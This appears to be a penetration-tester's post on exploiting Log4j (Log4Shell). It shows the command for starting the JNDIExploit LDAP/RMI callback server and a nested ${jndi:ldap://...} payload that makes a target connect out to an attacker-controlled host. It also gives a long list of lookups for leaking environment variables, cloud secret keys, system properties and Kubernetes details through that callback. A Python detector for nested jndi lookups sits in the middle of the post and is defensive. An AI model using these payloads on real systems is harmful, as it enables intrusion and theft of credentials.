Log4j vulnerability: details commonly needed during a penetration test

Note: how to detect whether a target is affected by Log4j is not covered here; the most convenient method is still Burp Suite with the plugin below, combined with Ceye, which is efficient and has a low false-positive rate.

Plugin: https://github.com/pmiaowu/log4j2Scan

Once a target has been found to be vulnerable, the callback shows up in Ceye, but rmi and ldap may never yield a shell or command execution. At that point you probably need to collect information about the target system. To view that information quickly and in real time, it is often necessary to start your own ldap or rmi server instead of relying on Ceye (its sluggish data loading, or polling the API over and over for results, is a hassle).

The files from https://github.com/Mr-xn/JNDIExploit-1 are used here.

For detailed usage, see the README on GitHub. The current test uses the following command:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xxx.xxx.xxx.xxx -l 1389 -p 8080

Once it is running, repeatedly send the following payload through Burp's Repeater:

${jndi:ldap://xxx.xxx.xxx.xxx:1389/${log4j:configParentLocation}}

The result looks like this:

Commonly used information-gathering lookups:

${log4j:configParentLocation}   # parent directory of the log4j configuration file
${log4j:configLocation}         # log4j configuration file name (the file name tells you whether it is log4j or log4j2; the vulnerable versions are Log4j <= 2.15.0-rc1, not every log4j is vulnerable)
${hostName}                     # host name
${date:MM-dd-yyyy}              # current server date
${java:os}                      # operating system information (Linux)
${java:version}                 # Java version on the target (from JDK 1.8u191 on, loading classes remotely over RMI and LDAP is disabled by default)
${java:runtime}                 # Java runtime environment version
${java:vm}                      # virtual machine information
${java:hw}                      # hardware information
${java:locale}                  # locale information
${env:CLASSPATH}                # Java CLASSPATH environment variable
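The nested form used above, a lookup such as ${log4j:configParentLocation} wrapped inside a ${jndi:...} lookup, is also what a defender should key on in request headers and application logs. As an added example, not code from the original post or from the JNDIExploit project, the Python below walks a string with a brace stack (a flat regex misses nesting), flags any ${jndi:...} lookup and reports which inner lookups it would resolve and send to the callback server; the sample lines are constructed and the host 203.0.113.10 is a documentation address.

```python
def extract_lookups(text):
    """Return every ${...} lookup in text, innermost first, with braces balanced.

    A flat regex such as r"\\$\\{[^}]*\\}" stops at the first '}', so it misses
    payloads like ${jndi:ldap://host:1389/${log4j:configParentLocation}}.
    """
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            found.append(text[start:i + 1])
        i += 1
    return found


def classify(line):
    """Classify one header value or log line.

    Returns a dict: "jndi" is True when a ${jndi:...} lookup is present,
    "exfil" lists the lookups nested inside it (the values that would be
    resolved on the server and leaked in the ldap/rmi request), and
    "lookups" lists every lookup seen, jndi or not.
    """
    lookups = extract_lookups(line)
    jndi = [l for l in lookups if l[2:].lower().startswith("jndi:")]
    exfil = []
    for j in jndi:
        exfil.extend(extract_lookups(j[2:-1]))  # strip the outer ${ and }
    return {"jndi": bool(jndi), "exfil": exfil, "lookups": lookups}


# Constructed sample input; 203.0.113.10 is a documentation-range address.
SAMPLE_LINES = [
    "User-Agent: ${jndi:ldap://203.0.113.10:1389/${log4j:configParentLocation}}",
    "X-Api-Version: ${jndi:rmi://203.0.113.10:1099/${env:JAVA_HOME}.${sys:user.name}}",
    "User-Agent: Mozilla/5.0 ${date:MM-dd-yyyy}",
]


def scan(lines):
    """Return only the lines that carry a ${jndi:...} lookup, with their findings."""
    return [(line, classify(line)) for line in lines if classify(line)["jndi"]]


if __name__ == "__main__":
    for line, result in scan(SAMPLE_LINES):
        print(f"ALERT jndi lookup, would leak {result['exfil']}: {line}")
```

The third sample line carries a harmless ${date:...} lookup and is not flagged, which is the distinction an alert rule should make: a lookup on its own is noise, a lookup nested inside ${jndi:...} is exfiltration.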

Further information can be collected in a single Burp run by submitting all of the following; some return nothing:

${ctx:loginId}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:A8_HOME}
${env:A8_ROOT_BIN}
${env:ALLUSERSPROFILE}
${env:APPDATA}
${env:AWS_SECRET_ACCESS_KE}
${env:CATALINA_BASE}
${env:CATALINA_HOME}
${env:CATALINA_OPTS}
${env:CATALINA_TMPDIR}
${env:CLASSPATH}
${env:CLIENTNAME}
${env:COMPUTERNAME}
${env:ComSpec}
${env:CommonProgramFiles}
${env:CommonProgramFiles(x86)}
${env:CommonProgramW6432}
${env:FP_NO_HOST_CHECK}
${env:HISTORY_FILE}
${env:HISTSIZE}
${env:HISTTIMEFORMAT}
${env:HOME}
${env:HOMEDRIVE}
${env:HOMEPATH}
${env:IP_CONNECTION}
${env:JAVA_HOME}
${env:JDK_JAVA_OPTIONS}
${env:JRE_HOME}
${env:Java_Home}
${env:LANG}
${env:LESSOPEN}
${env:LOCALAPPDATA}
${env:LOCAL_IP}
${env:LOGNAME}
${env:LOGONSERVER}
${env:MAIL}
${env:NUMBER_OF_PROCESSORS}
${env:OS}
${env:PATH}
${env:PATHEXT}
${env:PROCESSOR_ARCHITECTURE}
${env:PROCESSOR_IDENTIFIER}
${env:PROCESSOR_LEVEL}
${env:PROCESSOR_REVISION}
${env:PROMPT}
${env:PROMPT_COMMAND}
${env:PSModulePath}
${env:PUBLIC}
${env:PWD}
${env:Path}
${env:ProgramData}
${env:ProgramFiles}
${env:ProgramFiles(x86)}
${env:ProgramW6432}
${env:QT_GRAPHICSSYSTEM}
${env:QT_GRAPHICSSYSTEM_CHECKED}
${env:SESSIONNAME}
${env:SHELL}
${env:SHLVL}
${env:SSH_ASKPASS}
${env:SSH_CLIENT}
${env:SSH_CONNECTION}
${env:SystemDrive}
${env:SystemRoot}
${env:TEMP}
${env:TMP}
${env:ThisExitCode}
${env:USER}
${env:USERDOMAIN}
${env:USERNAME}
${env:USERPROFILE}
${env:WORK_PATH}
${env:XDG_RUNTIME_DIR}
${env:XDG_SESSION_ID}
${env:_}
${env:user}
${env:windir}
${env:windows_tracing_flags}
${env:windows_tracing_logfile}
${event:Marker}
$(unknown)
${hostName}
${java:os}
${java:runtime}
${java:vm}
${jndi:logging/context-name}
${k8s:accountName}
${k8s:clusterName}
${k8s:containerId}
${k8s:containerName}
${k8s:host}
${k8s:imageId}
${k8s:imageName}
${k8s:labels.app}
${k8s:labels.podTemplateHash}
${k8s:masterUrl}
${k8s:namespaceId}
${k8s:namespaceName}
${k8s:podId}
${k8s:podIp}
${k8s:podName}
${log4j:configLocation}
${log4j:configParentLocation}
${main:0}
${main:1}
${main:2}
${main:3}
${main:4}
${main:bar}
${main:myString}
${map:type}
${marker}
${marker:name}
${mdc:UserId}
${name}
${spring:profiles.active[0]}
${spring:spring.application.name}
${sys:PID}
${sys:awt.toolkit}
${sys:catalina.base}
${sys:catalina.home}
${sys:catalina.useNaming}
${sys:common.loader}
${sys:file.encoding}
${sys:file.encoding.pkg}
${sys:file.separator}
${sys:ignore.endorsed.dirs}
${sys:java.awt.graphicsenv}
${sys:java.awt.headless}
${sys:java.awt.printerjob}
${sys:java.class.path}
${sys:java.class.version}
${sys:java.endorsed.dirs}
${sys:java.ext.dirs}
${sys:java.home}
${sys:java.io.tmpdir}
${sys:java.library.path}
${sys:java.naming.factory.initial}
${sys:java.naming.factory.url.pkgs}
${sys:java.protocol.handler.pkgs}
${sys:java.runtime.name}
${sys:java.runtime.version}
${sys:java.security.egd}
${sys:java.specification.name}
${sys:java.specification.vendor}
${sys:java.specification.version}
${sys:java.util.concurrent.ForkJoinPool.common.parallelism}
${sys:java.util.concurrent.ForkJoinPool.common.threadFactory}
${sys:java.util.logging.config.file}
${sys:java.util.logging.manager}
${sys:java.vendor}
${sys:java.vendor.url}
${sys:java.vendor.url.bug}
${sys:java.version}
${sys:java.vm.info}
${sys:java.vm.name}
${sys:java.vm.specification.name}
${sys:java.vm.specification.vendor}
${sys:java.vm.specification.version}
${sys:java.vm.vendor}
${sys:java.vm.version}
${sys:jdk.tls.ephemeralDHKeySize}
${sys:line.separator}
${sys:localIp}
${sys:logPath}
${sys:org.apache.catalina.security.SecurityListener.UMASK}
${sys:os.arch}
${sys:os.name}
${sys:os.version}
${sys:package.access}
${sys:package.definition}
${sys:path.separator}
${sys:server.loader}
${sys:shared.loader}
${sys:spring.beaninfo.ignore}
${sys:spring.session.redis.namespace}
${sys:sun.arch.data.model}
${sys:sun.boot.class.path}
${sys:sun.boot.library.path}
${sys:sun.cpu.endian}
${sys:sun.cpu.isalist}
${sys:sun.io.unicode.encoding}
${sys:sun.java.command}
${sys:sun.java.launcher}
${sys:sun.jnu.encoding}
${sys:sun.management.compiler}
${sys:sun.nio.ch.bugLevel}
${sys:sun.os.patch.level}
${sys:sun.rmi.transport.tcp.responseTimeout}
${sys:tomcat.util.buf.StringCache.byte.enabled}
${sys:tomcat.util.scan.StandardJarScanFilter.jarsToScan}
${sys:tomcat.util.scan.StandardJarScanFilter.jarsToSkip}
${sys:user.country}
${sys:user.dir}
${sys:user.home}
${sys:user.language}
${sys:user.name}
${sys:user.timezone}
${web:rootDir}